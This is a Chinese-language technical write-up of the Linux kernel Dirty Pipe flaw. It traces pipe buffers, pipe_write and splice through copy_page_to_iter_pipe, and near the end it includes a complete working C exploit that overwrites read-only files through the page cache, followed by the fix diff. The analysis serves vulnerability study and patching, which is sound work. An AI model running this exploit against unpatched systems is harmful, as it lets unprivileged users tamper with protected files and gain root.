[TOC]

前言

影响范围：5.8 ~ 5.16.11、5.15.25、5.10.102
攻击效果：普通用户可以覆盖任意可读文件中的前一页大小的数据（如果文件大小有一页的话）
利用限制：文件必须可读；最多写一页大小(其实不足一页)；不能增加文件内容，只能进行覆写

注：这里之所以用覆盖一词，是因为该漏洞不能扩大文件，只能覆写原来的内容

pipe 管道

管道是一种进程间通信的工具，可以使用 pipe/pipe2（没有说明，均指匿名管道）进行创建，其中内核会为管道创建一个虚拟的 inode，并分配两个文件描述符，分别表示读端和写端。

当我们创建一个管道时，内核会为其分配一个 pipe_inode_info 结构体和一个 pipe_buffer 结构体数组。其中笔者理解的是pipe_inode_info 存放的是管道的元数据，pipe_buffer 存放的是管道缓冲区的元数据。

先来看下 pipe_buffer：

/**
 *    struct pipe_buffer - a linux kernel pipe buffer
 *    @page: the page containing the data for the pipe buffer
 *    @offset: offset of data inside the @page
 *    @len: length of data inside the @page
 *    @ops: operations associated with this buffer. See @pipe_buf_operations.
 *    @flags: pipe buffer flags. See above.
 *    @private: private data owned by the ops.
 **/
struct pipe_buffer {
    struct page *page; // 存放数据的页框
    unsigned int offset, len; // 数据的偏移和大小
    const struct pipe_buf_operations *ops; // 操作该 buffer 的函数表
    unsigned int flags; // 标志
    unsigned long private; // 私有数据
};

再来看下 pipe_inode_info：

/**
 *    struct pipe_inode_info - a linux kernel pipe
 *    @mutex: 互斥体
 *    @rd_wait: 管道为空时，读者等待队列
 *    @wr_wait: 管道为满时，写者等待队列
 *    @head: 缓冲区 buffer 的生产点
 *    @tail: 缓存区 buffer 的消费点
 *    @note_loss: The next read() should insert a data-lost message
 *    @max_usage: The maximum number of slots that may be used in the ring
 *    @ring_size: 缓冲区的数量，2的幂
 *    @nr_accounted: The amount this pipe accounts for in user->pipe_bufs
 *    @tmp_page: 缓存释放的页面
 *    @readers: 管道目前的读者数量
 *    @writers: 管道目前的写者数量
 *    @files: 引用该管道的 file 结构体的数量 (protected by ->i_lock)
 *    @r_counter: 读者计数器
 *    @w_counter: 写者计数器
 *    @fasync_readers: reader side fasync
 *    @fasync_writers: writer side fasync
 *    @bufs: 环形缓冲区数组
 *    @user: the user who created this pipe
 *    @watch_queue: If this pipe is a watch_queue, this is the stuff for that
 **/
struct pipe_inode_info {
    struct mutex mutex;
    wait_queue_head_t rd_wait, wr_wait;
    unsigned int head;
    unsigned int tail;
    unsigned int max_usage;
    unsigned int ring_size;
#ifdef CONFIG_WATCH_QUEUE
    bool note_loss;
#endif
    unsigned int nr_accounted;
    unsigned int readers;
    unsigned int writers;
    unsigned int files;
    unsigned int r_counter;
    unsigned int w_counter;
    struct page *tmp_page;
    struct fasync_struct *fasync_readers;
    struct fasync_struct *fasync_writers;
    struct pipe_buffer *bufs;
    struct user_struct *user;
#ifdef CONFIG_WATCH_QUEUE
    struct watch_queue *watch_queue;
#endif
};

当使用 pipe/pipe2 系统调用创建管道时，其调用链如下：

do_pipe2()
    __do_pipe_flags()
        create_pipe_files()
            get_pipe_inode()
                alloc_pipe_info()

最后会调用到 alloc_pipe_info，其中 pipe_bufs 默认为 PIPE_DEF_BUFFERS 等于 16：

struct pipe_inode_info *alloc_pipe_info(void)
{
    struct pipe_inode_info *pipe;
    unsigned long pipe_bufs = PIPE_DEF_BUFFERS;
    struct user_struct *user = get_current_user();
    unsigned long user_bufs;
    unsigned int max_size = READ_ONCE(pipe_max_size);

    pipe = kzalloc(sizeof(struct pipe_inode_info), GFP_KERNEL_ACCOUNT);

    // ......

    pipe->bufs = kcalloc(pipe_bufs, sizeof(struct pipe_buffer),
                 GFP_KERNEL_ACCOUNT);
    // ......
}

所以整个关系图如下：

网上找了一个形象点的图（暂不知道图片出自何处，，侵权即删）：

pipe_write

当我们向管道中写入数据时，最后会调用函数表中的 pipe_write 函数：

const struct file_operations pipefifo_fops = {
    .open        = fifo_open,
    .llseek        = no_llseek,
    .read_iter    = pipe_read,
    .write_iter    = pipe_write,
    .poll        = pipe_poll,
    .unlocked_ioctl    = pipe_ioctl,
    .release    = pipe_release,
    .fasync        = pipe_fasync,
    .splice_write    = iter_file_splice_write,
};

pipe_write 函数如下：

static ssize_t
pipe_write(struct kiocb *iocb, struct iov_iter *from)
{
    struct file *filp = iocb->ki_filp;
    struct pipe_inode_info *pipe = filp->private_data;
    unsigned int head;
    ssize_t ret = 0;
    size_t total_len = iov_iter_count(from);
    ssize_t chars;
    bool was_empty = false;
    bool wake_next_writer = false;

    /* Null write succeeds. */
    if (unlikely(total_len == 0)) // total_len 为要写入的长度
        return 0;

    __pipe_lock(pipe);

    if (!pipe->readers) { // 如果读端全部关闭，写端会触发 SIGPIPE，可这也匿名管道的特性
        send_sig(SIGPIPE, current, 0);
        ret = -EPIPE;
        goto out;
    }

#ifdef CONFIG_WATCH_QUEUE
    if (pipe->watch_queue) {
        ret = -EXDEV;
        goto out;
    }
#endif

    /*
     * Only wake up if the pipe started out empty, since
     * otherwise there should be no readers waiting.
     *
     * If it wasn't empty we try to merge new data into
     * the last buffer.
     *
     * That naturally merges small writes, but it also
     * page-aligs the rest of the writes for large writes
     * spanning multiple pages.
     */
    head = pipe->head; // 获取缓冲区头
    was_empty = pipe_empty(head, pipe->tail); // 根据 head=tail 判断管道是否为空，就是环形队列
    chars = total_len & (PAGE_SIZE-1); // 取写入字符的一个页面大小
    if (chars && !was_empty) { // 如果 chars 不为0，且缓冲区不为空则尝试写入
        unsigned int mask = pipe->ring_size - 1; // 获取缓冲区数量的 mask
        struct pipe_buffer *buf = &pipe->bufs[(head - 1) & mask]; // 获取上一个缓冲区，注意这里与上 mask 是因为是环形队列，比如若 head 等于0，则其上一个缓冲区应该是16，这时(0-1)&mask刚好为16
        int offset = buf->offset + buf->len; // 可能开始写入的偏移
        // 如果上一个缓冲区设置了 PIPE_BUF_FLAG_CAN_MERGE 标志，并且剩余空间可以满足我们要写入的长度，则尝试写入
        if ((buf->flags & PIPE_BUF_FLAG_CAN_MERGE) &&
            offset + chars <= PAGE_SIZE) {
            ret = pipe_buf_confirm(pipe, buf);  // 这里没有作用，因为 anon_pipe_buf_ops 的 comfirm 为 NULL
            if (ret)
                goto out;

            ret = copy_page_from_iter(buf->page, offset, chars, from); // 尝试写入
            if (unlikely(ret < chars)) { // 写入失败
                ret = -EFAULT;
                goto out;
            }

            buf->len += ret; // 写入成功，更新缓冲区已写入数据长度
            if (!iov_iter_count(from))
                goto out;
        }
    }
    // 往后面的 buffer 写入<剩余的>数据
    for (;;) {
        if (!pipe->readers) { // 读端全部关闭，写者触发 SIGPIPE
            send_sig(SIGPIPE, current, 0);
            if (!ret)
                ret = -EPIPE;
            break;
        }

        head = pipe->head; // 获取当前缓冲区
        if (!pipe_full(head, pipe->tail, pipe->max_usage)) { // 如果管道没满
            unsigned int mask = pipe->ring_size - 1;
            struct pipe_buffer *buf = &pipe->bufs[head & mask]; // 当前缓冲区
            struct page *page = pipe->tmp_page; // 尝试复用之前释放的页面
            int copied;

            if (!page) { // 之前没有释放，则分配新的页面
                page = alloc_page(GFP_HIGHUSER | __GFP_ACCOUNT);
                if (unlikely(!page)) {
                    ret = ret ? : -ENOMEM;
                    break;
                }
                pipe->tmp_page = page;
            }

            /* Allocate a slot in the ring in advance and attach an
             * empty buffer.  If we fault or otherwise fail to use
             * it, either the reader will consume it or it'll still
             * be there for the next write.
             */
            spin_lock_irq(&pipe->rd_wait.lock); // 上锁

            head = pipe->head;
            if (pipe_full(head, pipe->tail, pipe->max_usage)) { // 如果管道满了，则 continue
                spin_unlock_irq(&pipe->rd_wait.lock);
                continue;
            }

            pipe->head = head + 1; // 移动队列头，但笔者感觉这里应该与上 mask
            spin_unlock_irq(&pipe->rd_wait.lock); // 解锁

            /* Insert it into the buffer array */
            // 将分配的页面插入缓冲区中
            buf = &pipe->bufs[head & mask]; 
            buf->page = page;
            buf->ops = &anon_pipe_buf_ops;
            buf->offset = 0;
            buf->len = 0;
            if (is_packetized(filp)) // 其实就是检测是否有O_DIRECT标志
                buf->flags = PIPE_BUF_FLAG_PACKET; // 有该标志
            else
                buf->flags = PIPE_BUF_FLAG_CAN_MERGE; // 没有该标志
            pipe->tmp_page = NULL;

            copied = copy_page_from_iter(page, 0, PAGE_SIZE, from); // 拷贝数据到缓冲区page中
            if (unlikely(copied < PAGE_SIZE && iov_iter_count(from))) {
                if (!ret)
                    ret = -EFAULT;
                break;
            }
            ret += copied;
            buf->offset = 0;
            buf->len = copied;

            if (!iov_iter_count(from)) // 数据读取完毕，break
                break;
        }
        // 再次检测管道是否没满
        if (!pipe_full(head, pipe->tail, pipe->max_usage)) 
            continue;

        /* Wait for buffer space to become available. */
        if (filp->f_flags & O_NONBLOCK) { // 如果设置了非阻塞，则管道满了，写者直接返回
            if (!ret)
                ret = -EAGAIN;
            break;
        }
        if (signal_pending(current)) {
            if (!ret)
                ret = -ERESTARTSYS;
            break;
        }
        // 后面就是尝试等待管道没满了
        /*
         * We're going to release the pipe lock and wait for more
         * space. We wake up any readers if necessary, and then
         * after waiting we need to re-check whether the pipe
         * become empty while we dropped the lock.
         */
        __pipe_unlock(pipe);
        if (was_empty) {
            wake_up_interruptible_sync_poll(&pipe->rd_wait, EPOLLIN | EPOLLRDNORM);
            kill_fasync(&pipe->fasync_readers, SIGIO, POLL_IN);
        }
        wait_event_interruptible_exclusive(pipe->wr_wait, pipe_writable(pipe));
        __pipe_lock(pipe);
        was_empty = pipe_empty(pipe->head, pipe->tail);
        wake_next_writer = true;
    }
out:
    if (pipe_full(pipe->head, pipe->tail, pipe->max_usage))
        wake_next_writer = false;
    __pipe_unlock(pipe);

    /*
     * If we do do a wakeup event, we do a 'sync' wakeup, because we
     * want the reader to start processing things asap, rather than
     * leave the data pending.
     *
     * This is particularly important for small writes, because of
     * how (for example) the GNU make jobserver uses small writes to
     * wake up pending jobs
     */
    if (was_empty) {
        wake_up_interruptible_sync_poll(&pipe->rd_wait, EPOLLIN | EPOLLRDNORM);
        kill_fasync(&pipe->fasync_readers, SIGIO, POLL_IN);
    }
    if (wake_next_writer)
        wake_up_interruptible_sync_poll(&pipe->wr_wait, EPOLLOUT | EPOLLWRNORM);
    if (ret > 0 && sb_start_write_trylock(file_inode(filp)->i_sb)) {
        int err = file_update_time(filp);
        if (err)
            ret = err;
        sb_end_write(file_inode(filp)->i_sb);
    }
    return ret;
}

所以整个流程大致如下：

前置检查
- 如果写入数据长度为0，则直接返回
- 如果读端全部关闭，则发送 GIGPIPE信号，然后直接返回
尝试写入
- 若管道非空，且上一个缓冲区设置了 PIPE_BUF_FLAG_CAN_MERGE 标志，并且有足够的空间写入低一页的数据，则进行写入
- 若管道没满，然后写入<剩余>数据到新的缓冲区中，若创建管道时没有设置O_DIRECT，则pipe_buffer 会设置 PIPE_BUF_FLAG_CAN_MERGE 标志，然后尝试写入
- 若管道满了，但是设置了阻塞，则循环等待尝试第2步；若设置了非阻塞，则直接返回

所以可以看出在进行写管道时，每次会为缓冲区设置 PIPE_BUF_FLAG_CAN_MERGE 标志（默认情况下，因为使用pipe创建管道时，flag默认为0）。

pipe_read

读管道其实没啥好说的，就是读一个循环队列而已。

static ssize_t
pipe_read(struct kiocb *iocb, struct iov_iter *to)
{
    size_t total_len = iov_iter_count(to);
    struct file *filp = iocb->ki_filp;
    struct pipe_inode_info *pipe = filp->private_data;
    bool was_full, wake_next_reader = false;
    ssize_t ret;

    /* Null read succeeds. */
    if (unlikely(total_len == 0)) // 预读取的数据大小为0，则直接返回
        return 0;

    ret = 0;
    __pipe_lock(pipe); // 上锁

    /*
     * We only wake up writers if the pipe was full when we started
     * reading in order to avoid unnecessary wakeups.
     *
     * But when we do wake up writers, we do so using a sync wakeup
     * (WF_SYNC), because we want them to get going and generate more
     * data for us.
     */
    // 如果管道是满的，只有当开始读时，才唤醒写者；可以参考上面英文注释，其实好好理解，如果管道时满的，又没有读者读数据，那么你唤醒写者页没有用
    was_full = pipe_full(pipe->head, pipe->tail, pipe->max_usage); // 管道是否满
    for (;;) {
        unsigned int head = pipe->head; // 队列头
        unsigned int tail = pipe->tail; // 队列尾
        unsigned int mask = pipe->ring_size - 1; // 缓冲区个数 mask

#ifdef CONFIG_WATCH_QUEUE // 这个就不看了，看主要逻辑吧
        if (pipe->note_loss) {
            struct watch_notification n;

            if (total_len < 8) {
                if (ret == 0)
                    ret = -ENOBUFS;
                break;
            }

            n.type = WATCH_TYPE_META;
            n.subtype = WATCH_META_LOSS_NOTIFICATION;
            n.info = watch_sizeof(n);
            if (copy_to_iter(&n, sizeof(n), to) != sizeof(n)) {
                if (ret == 0)
                    ret = -EFAULT;
                break;
            }
            ret += sizeof(n);
            total_len -= sizeof(n);
            pipe->note_loss = false;
        }
#endif

        if (!pipe_empty(head, tail)) { // 如果管道不为空
            struct pipe_buffer *buf = &pipe->bufs[tail & mask]; // 从队列尾开始读
            size_t chars = buf->len; // 缓冲区中的数据大小
            size_t written;
            int error;

            if (chars > total_len) { // 如果缓冲区的数据大小大于预读取数据的大小
                if (buf->flags & PIPE_BUF_FLAG_WHOLE) { // 整块读标志 PIPE_BUF_FLAG_WHOLE
                    if (ret == 0)
                        ret = -ENOBUFS;
                    break;
                }
                chars = total_len;
            }

            error = pipe_buf_confirm(pipe, buf); // 没啥用
            if (error) {
                if (!ret)
                    ret = error;
                break;
            }

            written = copy_page_to_iter(buf->page, buf->offset, chars, to); // 读数据
            if (unlikely(written < chars)) {
                if (!ret)
                    ret = -EFAULT;
                break;
            }
            ret += chars;
            buf->offset += chars;
            buf->len -= chars;

            /* Was it a packet buffer? Clean up and exit */
            if (buf->flags & PIPE_BUF_FLAG_PACKET) {
                total_len = chars;
                buf->len = 0;
            }

            if (!buf->len) { // 缓冲区数据被全部读完
                pipe_buf_release(pipe, buf); // 释放缓冲区
                spin_lock_irq(&pipe->rd_wait.lock);
#ifdef CONFIG_WATCH_QUEUE
                if (buf->flags & PIPE_BUF_FLAG_LOSS)
                    pipe->note_loss = true;
#endif
                tail++;
                pipe->tail = tail;
                spin_unlock_irq(&pipe->rd_wait.lock);
            }
            total_len -= chars;
            if (!total_len) // 数据读取完毕
                break;    /* common path: read succeeded */
            if (!pipe_empty(head, tail))    /* More to do? */
                continue;
        }

        if (!pipe->writers)
            break;
        if (ret)
            break;
        if (filp->f_flags & O_NONBLOCK) {
            ret = -EAGAIN;
            break;
        }
        __pipe_unlock(pipe);

        /*
         * We only get here if we didn't actually read anything.
         *
         * However, we could have seen (and removed) a zero-sized
         * pipe buffer, and might have made space in the buffers
         * that way.
         *
         * You can't make zero-sized pipe buffers by doing an empty
         * write (not even in packet mode), but they can happen if
         * the writer gets an EFAULT when trying to fill a buffer
         * that already got allocated and inserted in the buffer
         * array.
         *
         * So we still need to wake up any pending writers in the
         * _very_ unlikely case that the pipe was full, but we got
         * no data.
         */
        if (unlikely(was_full)) {
            wake_up_interruptible_sync_poll(&pipe->wr_wait, EPOLLOUT | EPOLLWRNORM);
            kill_fasync(&pipe->fasync_writers, SIGIO, POLL_OUT);
        }

        /*
         * But because we didn't read anything, at this point we can
         * just return directly with -ERESTARTSYS if we're interrupted,
         * since we've done any required wakeups and there's no need
         * to mark anything accessed. And we've dropped the lock.
         */
        if (wait_event_interruptible_exclusive(pipe->rd_wait, pipe_readable(pipe)) < 0)
            return -ERESTARTSYS;

        __pipe_lock(pipe);
        was_full = pipe_full(pipe->head, pipe->tail, pipe->max_usage);
        wake_next_reader = true;
    }
    if (pipe_empty(pipe->head, pipe->tail))
        wake_next_reader = false;
    __pipe_unlock(pipe);

    if (was_full) {
        wake_up_interruptible_sync_poll(&pipe->wr_wait, EPOLLOUT | EPOLLWRNORM);
        kill_fasync(&pipe->fasync_writers, SIGIO, POLL_OUT);
    }
    if (wake_next_reader)
        wake_up_interruptible_sync_poll(&pipe->rd_wait, EPOLLIN | EPOLLRDNORM);
    if (ret > 0)
        file_accessed(filp);
    return ret;
}

大致流程：

就环形队列读，当缓冲区数据被读完时，释放缓冲区

splice 零拷贝

当我们想要将一个文件的数据拷贝到另一个文件时，常规做法就是打开两个文件，然后从源文件中读取数据，然后再将数据写入目标文件。但是这个做法需要多次在内核空间与用户空间之间进行数据拷贝，比较浪费资源。

而 splice 系统调用则利用 pipe 作为内核缓冲区，从而避免数据在内核空间与用户空间之间的拷贝造成的开销。

#define _GNU_SOURCE
#include <fcntl.h>
typedef long long loff_t
ssize_t splice(int fd_in, loff_t *off_in, int fd_out, loff_t *off_out, size_t len, unsigned int flags);

当我们想要将一个文件的数据拷贝到另一个文件时：

我们可以先创建一个管道作为缓冲区
然后利用 splice 将源文件数据拷贝到管道中
最后再利用 splice 将管道中的数据拷贝到目标文件中即可

而我们知道，对于文件，其读写一般都是对 page_cache 进行的，所以上述整个数据拷贝过程都在内核空间进行

splice系统调用链如下：

/*
splice
    __do_splice
        do_splice
            splice_pipe_to_pipe
            do_splice_from
            splice_file_to_pipe
*/

在 do_splice 中会根据数据的流向去调用不同的函数：

从管道读取到管道，调用 splice_pipe_to_pipe
从管道读取到文件，调用 do_splice_from
从文件读取到管道，调用 splice_file_to_pipe

文件读取到管道

这里仅仅分析从文件读取到管道这一路径，这也是 dirty pipe 漏洞产生的关键地方。

而该函数有如下调用链：

/*
splice_file_to_pipe
    do_splice_to
         in->f_op->splice_read
             ......
                 filemap_read
                     filemap_get_pages
                     copy_page_to_iter
                         copy_page_to_iter_pipe
*/

最后会在 copy_page_to_iter_pipe 中，将文件的 page_cache 设置为对应 pipe_buffer 的 page，这样就相当于将文件中的数据拷贝到了管道中，可以看到这里并没有进行数据的实际拷贝，而是直接将 page_cache 挂在 pipe_buffer 上，所以是非常高效的。

其实这里大家就可以产生一个疑问了？我们是可以对管道进行读写操作的，那么现在 page_cache 挂在了 pipe_buffer 上，那是不是意味着我们可以直接对 page_cache 进行读写了呢？其实只要我们设置好相应的限制就可以避免这一点，而 dirty pipe 产生的原因就是没有做好相关的限制，使得我们可以直接对 page_cache 进行写操作（当然这都是马后炮）。

 static size_t copy_page_to_iter_pipe(struct page *page, size_t offset, size_t bytes,
             struct iov_iter *i)
{
    struct pipe_inode_info *pipe = i->pipe;
    struct pipe_buffer *buf;
    unsigned int p_tail = pipe->tail;
    unsigned int p_mask = pipe->ring_size - 1;
    unsigned int i_head = i->head;
    size_t off;

    if (unlikely(bytes > i->count))
        bytes = i->count;

    if (unlikely(!bytes))
        return 0;

    if (!sanity(i))
        return 0;

    off = i->iov_offset;
    buf = &pipe->bufs[i_head & p_mask];
    if (off) {
        if (offset == off && buf->page == page) {
            /* merge with the last one */
            buf->len += bytes;
            i->iov_offset += bytes;
            goto out;
        }
        i_head++;
        buf = &pipe->bufs[i_head & p_mask];
    }
    if (pipe_full(i_head, p_tail, pipe->max_usage))
        return 0;

    buf->ops = &page_cache_pipe_buf_ops;
    get_page(page); // 页框引用计数加1
    buf->page = page; // 将缓冲区的page设置为对应的page_cache
    buf->offset = offset;
    buf->len = bytes;

    pipe->head = i_head + 1; // head 加1
    i->iov_offset = offset + bytes;
    i->head = i_head;
out:
    i->count -= bytes;
    return bytes;
}

可以看到这里将 buf->page 设置为了 page_cache，并且将 pipe->head 加了1（这里与后面利用有关），但是并没有设置 buf 的 flags 标志。

网上找了个形象点的图（暂不知图片出自何处，侵权即删）：

漏洞分析

在上面我们已经分析了，在 copy_page_to_iter_pipe 函数中：

将 buf->page 设置为了 page_cache
将 pipe->head 加1
并没设置 buf 的 flags 标志，其保留的还是之前的标志

那么这里就会存在一个问题，在 pipe_write 中，我们分析了，在进行管道写时：

如果管道非空，且上一个缓冲区设置了 PIPE_BUF_FLAG_CAN_MERGE 标志，并且有足够的空间写入低一页的数据，则进行写入

所以虽然这里 pipe->head 加了1，但是如果上一个 buf 的 flags 标志设置了 PIPE_BUF_FLAG_CAN_MERGE 标志的话，并且其缓冲区有足够的空闲大小，则可以往里面写入数据。而在 copy_page_to_iter_pipe 没有设置 flags，保留的还是之前的 flags，而 copy_page_to_iter_pipe 就是在 pipe_write 中设置的（创建管道时不设置 O_DRIECT 标志即可）。所以这就给了我们往 page_cache 中写入数据的机会。

漏洞利用

prepare pipe
- 1、创建管道，并且不要设置 o_DIRECT 标志（默认即没有设置 O_DRIECT）
- 2、往管道中的所有缓冲区中写满数据，从而设置 PIPE_BUF_FLAG_CAN_MERGE 标志
- 3、将管道中的数据全部读出来
splice
- 1、利用 splice 系统调用将目标文件的一字节写入管道，此时管道中的某 buf 的 page 挂的就是 page_cache，并且 flags 保留了 prepare pipe 操作中的标志，此时带有 PIPE_BUF_FLAG_CAN_MERGE
- 2、然后就可以往 page_cache 中写数据了

注：通过上述函数分析可知：

目标文件必须可读，毕竟要将目标文件的数据读取到管道上
不能在页边界上写，在 pipe_write 中进行写入时，写入的字节应当满足total_len & (PAGE_SIZE-1) != 0
每个页面的第一个字节不能修改，因为至少得将文件上的一字节读取到管道中，而此时 buf->len 会被设置，写入时是从 offset+len 开始写的
写入时是针对 page_cache，所有不能修改文件大小，只能覆写；并且我们是通过管道写的 page_cache，所有其不会被标脏，所以修改只是暂时的，不会写回磁盘

exp如下：

#define _GNU_SOURCE
#include <unistd.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/user.h>

#define PAGE_SIZE 0x1000

void usage()
{
        puts("[+] Usage: ./exp target_file offset data");
        exit(-1);
}

void err_exit(char* msg)
{
        printf("[X] %s\n", msg);
        exit(-1);
}

int main(int argc, char** argv, char** env)
{

        int fd;
        int pipe_fd[2];
        loff_t offset;
        int data_size;
        char buf[PAGE_SIZE];
        struct stat st;

        if (argc < 4) usage();

        offset = atoi(argv[2]);
        if (offset % PAGE_SIZE == 0) err_exit("Can't write boundary of page");

        fd = open(argv[1], O_RDONLY);
        if (fd < 0) err_exit("Can't open target file");

        if (fstat(fd, &st) < 0) err_exit("Can't get information of target file");

        data_size = strlen(argv[3]);
        if ((offset&0xfff) + data_size > st.st_size) err_exit("Can't write out of file size");

        if (pipe(pipe_fd) < 0) err_exit("Can't create pipe");

        for (int i = 0; i < 16; i++)
                if (write(pipe_fd[1], buf, PAGE_SIZE) < 0) err_exit("Can't write pipe");

        for (int i = 0; i < 16; i++)
                if (read(pipe_fd[0], buf, PAGE_SIZE) < 0) err_exit("Can't read pipe");

        offset--;
        if (splice(fd, &offset, pipe_fd[1], NULL, 1, 0) <= 0) err_exit("Failed at splice");

        if (write(pipe_fd[1], argv[3], data_size) < 0) err_exit("Failed to write page cache");

        return 0;
}

内核版本5.13.0，测试效果如下：

总结

补丁：比较简单，就是设置一下 flags

diff --git a/lib/iov_iter.c b/lib/iov_iter.c
index b0e0acdf96c15..6dd5330f7a995 100644
--- a/lib/iov_iter.c
+++ b/lib/iov_iter.c
@@ -414,6 +414,7 @@ static size_t copy_page_to_iter_pipe(struct page *page, size_t offset, size_t by
         return 0;

     buf->ops = &page_cache_pipe_buf_ops;
+    buf->flags = 0;
     get_page(page);
     buf->page = page;
     buf->offset = offset;
@@ -577,6 +578,7 @@ static size_t push_pipe(struct iov_iter *i, size_t size,
             break;

         buf->ops = &default_pipe_buf_ops;
+        buf->flags = 0;
         buf->page = page;
         buf->offset = 0;
         buf->len = min_t(ssize_t, left, PAGE_SIZE);

其实这类漏洞还是比较难发现了，因为一般情况下，它并不会造成系统 crash、宕机等，但是其利用确实非常简单，并不需要绕过 KASLR 等等保护，所以这也是为啥这个漏洞的评分如此高的原因。